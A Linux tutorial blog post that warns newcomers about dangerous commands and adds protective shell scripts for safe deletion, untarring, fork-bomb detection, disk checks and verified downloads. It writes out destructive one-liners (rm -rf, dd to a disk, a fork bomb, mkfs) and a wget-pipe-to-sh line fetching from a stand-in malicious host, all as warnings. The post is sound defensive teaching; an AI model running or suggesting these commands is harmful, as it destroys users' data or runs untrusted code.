Linux/Unix : Commands that you need to be careful about
Many people have caught the "startup" bug and are learning, for the first time, how to develop their own web application or native app that talks to a backend server such as a Linux box. Along the way, some of these "newbies" will be duped by "seniors" doing it just for fun, or by competitors and hackers looking to sabotage them.

Just the other day, a friend got pranked by a fork bomb, and I'm writing this tutorial so that newbies learning Linux/Unix will be aware of these commands and their associated dangers. Hopefully they (the newbies) won't one day get pranked by someone asking them to issue these commands, to see some hidden easter egg or to put their machine into "super mode", and kill their own server.

1. rm -rf command

In Linux/Unix/MacOSX, the rm command removes files. Adding the -rf parameters makes rm -rf remove the target directory, or files, recursively and WITHOUT prompting you for confirmation. Run as root or under sudo, it silently and elegantly removes everything in its path. Be very careful with rm -rf and treat it like a grenade. If in doubt, do not use it unless you have a backup of the files or directory that you want to delete.
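The classic way this goes wrong in a script is an unset variable: `rm -rf "$DIR"/` with DIR empty becomes `rm -rf /`. The wrapper below is an added example, not code from the original post. It resolves the target physically (symlinks and ".." included), refuses an empty argument, refuses "/", and refuses anything outside an allowed base directory before it ever calls rm. The base directory defaults to $TMPDIR and the function name is my own choice, not a standard tool. Note that modern GNU coreutils already refuse `rm -rf /` unless you pass --no-preserve-root; the check here also covers the far more common "wrong directory" case.

```shell
#!/bin/sh
# Added example: a guarded "rm -rf". Refuses the usual accidents
# (empty variable, "/", a path outside the allowed base) before deleting.

# safe_rm_dir TARGET [BASE]
#   Deletes TARGET recursively only if it is a directory strictly inside
#   BASE (default: $TMPDIR or /tmp). Returns 1 and deletes nothing otherwise.
safe_rm_dir() {
    target=$1
    base=${2:-${TMPDIR:-/tmp}}

    # An unset variable turns 'rm -rf "$DIR"/' into 'rm -rf /'.
    if [ -z "$target" ]; then
        echo "refusing: empty target" >&2
        return 1
    fi
    if [ ! -d "$target" ]; then
        echo "refusing: not a directory: $target" >&2
        return 1
    fi

    # Resolve symlinks and ".." so the containment check cannot be tricked
    # by a link that points outside the base.
    resolved=$(cd "$target" && pwd -P) || return 1
    base_resolved=$(cd "$base" && pwd -P) || return 1

    case "$resolved" in
        /)
            echo "refusing: will not remove /" >&2
            return 1 ;;
        "$base_resolved"/*)
            ;;   # strictly inside the allowed base: fine
        *)
            echo "refusing: $resolved is outside $base_resolved" >&2
            return 1 ;;
    esac

    # "--" stops a directory name beginning with "-" being read as an option.
    rm -rf -- "$resolved"
}
```

Usage: `safe_rm_dir "$BUILD_DIR" /var/build` deletes the build directory only if it really lives under /var/build; every refusal goes to stderr with the reason, which is what you want in a cron job or CI log.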

2. Files overwritten by tar bomb

Sometimes you download software directly from a repository onto your Linux box and get a gzipped tar file. After gunzipping the tar.gz you need to untar the tar file, and it may turn out that the archive contains files with the same names as files already in your current directory, overwriting your originals.

You might want to see the archive's file list first by running tar -t file.tar before actually untarring it. The -t option means "List archive contents to stdout", i.e. it shows the contents on screen before (or during) the untarring process.

A good practice is to always move the tar file into a new, empty directory before untarring it. This prevents your files from being overwritten during the untarring process.
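The two practices above, listing first and extracting into a fresh directory, combined into one preview step. This is an added example and not code from the original post. tar_preview lists the archive with tar -t, flags every entry that would land on top of an existing file in the destination, and also flags absolute paths and ".." components (a "tar bomb" of the nastier kind, which writes outside the directory you extract into). extract_fresh does the safe thing regardless: it unpacks into a brand-new temporary directory and prints its name. Function names and the temp-directory template are my own choices. Modern GNU tar strips a leading "/" and refuses ".." by default, but older or non-GNU tars do not, so the check is still worth running.

```shell
#!/bin/sh
# Added example: look before you untar.

# tar_preview ARCHIVE [DEST]
#   Lists ARCHIVE and reports, on stderr, every member that would overwrite
#   an existing file under DEST (default ".") or that uses an unsafe path.
#   Returns 0 only if nothing was flagged.
tar_preview() {
    archive=$1
    dest=${2:-.}
    listing=$(mktemp) || return 2
    tar -tf "$archive" > "$listing" || { rm -f "$listing"; return 2; }

    problems=0
    while IFS= read -r entry; do
        # Absolute paths and ".." components escape the extraction directory.
        case "$entry" in
            /*|../*|*/../*|*/..)
                echo "unsafe path in archive: $entry" >&2
                problems=$((problems + 1)) ;;
        esac
        # A member that already exists would be silently replaced by tar -x.
        if [ -e "$dest/$entry" ]; then
            echo "would overwrite: $dest/$entry" >&2
            problems=$((problems + 1))
        fi
    done < "$listing"
    rm -f "$listing"
    [ "$problems" -eq 0 ]
}

# extract_fresh ARCHIVE
#   Unpacks ARCHIVE into a new empty directory and prints that directory,
#   so nothing in the current directory can be touched.
extract_fresh() {
    archive=$1
    dir=$(mktemp -d "${TMPDIR:-/tmp}/untar.XXXXXX") || return 1
    tar -xf "$archive" -C "$dir" && echo "$dir"
}
```

Usage: `tar_preview software.tar && tar -xf software.tar` extracts in place only when it is safe, and `dir=$(extract_fresh software.tar)` is the always-safe alternative.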

3. dd command

From the man (manual) page: "dd -- convert and copy a file", so you might think it is just a tool for copying files.

Used correctly, it is. Used incorrectly, it can be harmful and even destroy your computer's primary hard disk partition.

If someone tells you to issue this command

dd if=/dev/zero of=/dev/disk0

or

dd if=/dev/zero of=/dev/hda (disk0 or hda, depending on your system configuration)

you had better be careful with that guy/gal. Never turn your back on that person! This command will basically zero out your primary hard disk partition!

4. Fork bomb command

For the uninitiated, this line, :(){ :|: & };: , looks like a row of smileys and quite harmless. However, if you run it in your terminal or from a shell/bash script, be prepared to restart your entire Linux machine.

Once this command is executed, it will "be fruitful and multiply" until all the system resources, CPU and memory, are maxed out. The only way out is to reboot the machine, and that will probably cause data loss.

It is actually a shell/bash function that calls itself recursively until your Linux system grinds to a halt. No root or sudo needed.

Read more at https://en.wikipedia.org/wiki/Fork_bomb
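What makes a fork bomb survivable is a per-user process limit, and what makes it visible is one account suddenly owning thousands of processes. The script below is an added example, not code from the original post: users_over_limit reads "ps -eo user=" style output (one user name per line) and prints every user above a threshold; check_live runs it against the real process table; cap_processes applies the soft limit to the current shell and everything it starts. The threshold of 500, the sample process table and the 4096 figure in the limits.conf comment are assumptions for the demo, not tuning advice for any particular system.

```shell
#!/bin/sh
# Added example: detect the symptom of a fork bomb and cap the blast radius.

# users_over_limit LIMIT
#   Reads one user name per line on stdin (the shape of "ps -eo user=")
#   and prints "COUNT USER" for every user owning more than LIMIT processes.
users_over_limit() {
    limit=$1
    sort | uniq -c | awk -v lim="$limit" '$1 > lim {print $1, $2}'
}

# check_live [LIMIT]
#   Same check against the live process table (default threshold 500).
check_live() {
    ps -eo user= | users_over_limit "${1:-500}"
}

# Constructed sample of what the table looks like while one account is
# multiplying out of control (alice owns 5 of 8 processes here).
SAMPLE_PS="root
root
www-data
alice
alice
alice
alice
alice"

# cap_processes N
#   Soft per-user process limit for this shell and its children; a fork
#   bomb started under it runs out of process slots instead of taking the
#   whole machine with it. To make it permanent for every login, put the
#   equivalent in /etc/security/limits.conf, for example:
#       *   hard   nproc   4096
cap_processes() {
    ulimit -S -u "$1"
}

# Run stand-alone: report over the constructed sample with a threshold of 3.
printf '%s\n' "$SAMPLE_PS" | users_over_limit 3
```

Run as a cron job, `check_live 500` printing anything is your early warning; on a machine with the process cap in place, the offending login can be killed with `pkill -u USER` without rebooting and losing data.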

5. mv directory /dev/null command

/dev/null is the null device, also known as the Unix/Linux black hole. I use it from time to time, as in cat /dev/null > somelogfile, to reset a file of a few gigabytes to zero size in an instant.

One should not simply use /dev/null unless you know how dangerous a black hole can be once you get near it. One of the most common pranks played on Linux/Unix newbies is to get them to issue the mv directory /dev/null command. This will cause the directory's contents to disappear instantly. Only use it if that is what you really want to do.
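Two small helpers around the log-truncation use above, added here as an example and not taken from the original post. dev_null_intact checks that /dev/null is still a character device: the black hole only works while the device node is there, and if a file is moved onto it by root it becomes an ordinary file that quietly collects everything written to it. truncate_log empties a log in place with the shell's own redirection, which is what the cat /dev/null > file trick really does, and explains why truncating beats deleting: a daemon that holds the log open keeps writing to the same inode, so rm would free nothing while truncation does. It refuses anything that is not a plain regular file. Function names are my own.

```shell
#!/bin/sh
# Added example: check the black hole is still a black hole, and empty a
# log file the safe way.

# dev_null_intact
#   Returns 0 if /dev/null is a character device, 1 if something has
#   replaced it (e.g. a file moved onto it), in which case writes "to the
#   black hole" are actually being stored on disk.
dev_null_intact() {
    if [ -c /dev/null ]; then
        return 0
    fi
    echo "warning: /dev/null is not a character device" >&2
    return 1
}

# truncate_log FILE
#   Empties FILE in place. The inode is kept, so a process that has the
#   file open carries on writing to it and the space is really freed.
#   Refuses devices, directories and symlinks so a typo cannot hit
#   something like /dev/sda or a link into another directory.
truncate_log() {
    f=$1
    if [ -L "$f" ] || [ ! -f "$f" ]; then
        echo "refusing: $f is not a regular file" >&2
        return 1
    fi
    : > "$f"
}
```

Usage: `dev_null_intact && truncate_log /var/log/myapp/app.log`. The `: > file` form needs no cat and no /dev/null at all, which is one fewer thing to get wrong.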

6. Make filesystem mkfs command

Unless you know what you are doing, do not simply run mkfs. The command is used to make a file system, i.e. to initialise a new device, or in other words to format it. Everything on the device will be gone.

For example, mkfs -t ext3 /dev/sda1 will format /dev/sda1 with the ext3 file system.
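Sections 3 (dd) and 6 (mkfs) share one root cause: a device name typed from memory, wrong by one letter, and no check before the write. The guard below is an added example, not code from the original post, meant to run before either command. It refuses if the argument is not a block device, if it backs the root filesystem, or if it or any partition of it is mounted, and then shows the disk's size and model so you can compare it with the disk you meant. It reads /proc/mounts and uses lsblk when available, so it is Linux-specific; the device names in the usage line are placeholders and the function names are my own.

```shell
#!/bin/sh
# Added example: a guard to run before any dd or mkfs against a disk.

# root_device
#   Prints the device currently mounted on "/" (Linux: from /proc/mounts).
root_device() {
    awk '$2 == "/" {print $1; exit}' /proc/mounts 2>/dev/null
}

# safe_to_overwrite DEV
#   Returns 0 only if DEV is a block device that does not hold the root
#   filesystem and is not mounted (nor is any partition of it). Prints the
#   device's size and model so the operator can confirm it is the right disk.
safe_to_overwrite() {
    dev=$1
    if [ -z "$dev" ]; then
        echo "refusing: no device given" >&2
        return 1
    fi
    # /dev/null, a regular file, a typo: none of these are block devices.
    if [ ! -b "$dev" ]; then
        echo "refusing: $dev is not a block device" >&2
        return 1
    fi
    # Never the disk that "/" lives on (covers sda, sda1, nvme0n1p1 styles).
    root=$(root_device)
    case "$root" in
        "$dev"|"$dev"[0-9]*|"$dev"p[0-9]*)
            echo "refusing: $dev holds the root filesystem ($root)" >&2
            return 1 ;;
    esac
    # Anything mounted from this device or one of its partitions is in use.
    if awk -v dev="$dev" 'index($1, dev) == 1 {found = 1} END {exit found ? 0 : 1}' \
            /proc/mounts 2>/dev/null; then
        echo "refusing: $dev (or a partition of it) is mounted" >&2
        return 1
    fi
    # Show what is about to be destroyed: size and model are the quickest
    # way to notice you have the wrong disk.
    if command -v lsblk >/dev/null 2>&1; then
        lsblk -o NAME,SIZE,MODEL,MOUNTPOINTS "$dev" 2>/dev/null || lsblk "$dev"
    fi
    return 0
}
```

Usage: `safe_to_overwrite /dev/sdb1 && mkfs -t ext3 /dev/sdb1`, or the same guard in front of a dd that writes an image to a USB stick. Chaining with && means a refusal (exit status 1) stops the destructive command from running at all.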

7. Downloading a script and executing it right away

There is plenty of "hacked" source code and popular software lying around the Internet, placed there by crackers looking for their next victim, and it even comes with "instructions" on how to get it installed on your Linux machine, such as:

 sudo wget http://download-hacked-code.com/let-me-screw-your-machine-file -O file | sh

If executed on your Linux machine, the above command runs the downloaded file straight away, without giving you a chance to scrutinise its contents first. Depending on the downloaded payload, the level of harm can vary. Again, unless you trust the source, do not do this!
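The safe version of the same install is download, verify, read, then run, as four separate steps. The script below is an added example and not code from the original post: file_sha256 hashes a file with whichever tool the system has, verify_sha256 compares it with a checksum you obtained out of band (the vendor's page over HTTPS, a signed release note), download_to_file fetches to disk without executing anything, and install_from_url strings them together and still stops to show you the script and ask before running it. The URL, the checksum and the function names are placeholders and my own choices; a real checksum comes from the software's publisher, never from the same download.

```shell
#!/bin/sh
# Added example: download to disk, verify, inspect, and only then execute.

# file_sha256 FILE
#   Prints the SHA-256 of FILE (GNU sha256sum or BSD/macOS shasum).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_sha256 FILE EXPECTED_HEX
#   Returns 0 if FILE hashes to EXPECTED_HEX, 1 on mismatch (with a message).
verify_sha256() {
    actual=$(file_sha256 "$1") || return 2
    if [ "$actual" = "$2" ]; then
        return 0
    fi
    echo "checksum mismatch for $1: expected $2, got $actual" >&2
    return 1
}

# download_to_file URL OUT
#   Fetches URL into OUT. Nothing is executed; -f makes curl fail on HTTP
#   errors instead of saving an error page as if it were the script.
download_to_file() {
    url=$1
    out=$2
    if command -v curl >/dev/null 2>&1; then
        curl -fsSL -o "$out" "$url"
    else
        wget -q -O "$out" "$url"
    fi
}

# install_from_url URL EXPECTED_HEX
#   The whole procedure. Runs the script as the current user; add sudo
#   yourself, after reading it, only if it genuinely needs root.
install_from_url() {
    url=$1
    expected=$2
    tmp=$(mktemp) || return 1
    download_to_file "$url" "$tmp" || { rm -f "$tmp"; return 1; }
    verify_sha256 "$tmp" "$expected" || { rm -f "$tmp"; return 1; }
    ${PAGER:-less} "$tmp"                       # read it before you run it
    printf 'Run %s now? [y/N] ' "$tmp"
    read ans
    status=1
    if [ "$ans" = y ] || [ "$ans" = Y ]; then
        sh "$tmp"
        status=$?
    fi
    rm -f "$tmp"
    return "$status"
}
```

Usage: `install_from_url https://example.invalid/install.sh <checksum-from-the-vendor-page>`. Even without a published checksum, the first two functions give you a file on disk to read and a hash to record, which is more than the one-liner in the "instructions" ever allows.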

References :

https://en.wikipedia.org/wiki/Fork_bomb

http://linux.die.net/man/8/mkfs

By Adam Ng

If you gained some knowledge here or the information solved your programming problem, please consider donating to the less fortunate or to a charity that you like. Apart from donating, planting trees, volunteering or reducing your carbon footprint would be great too.
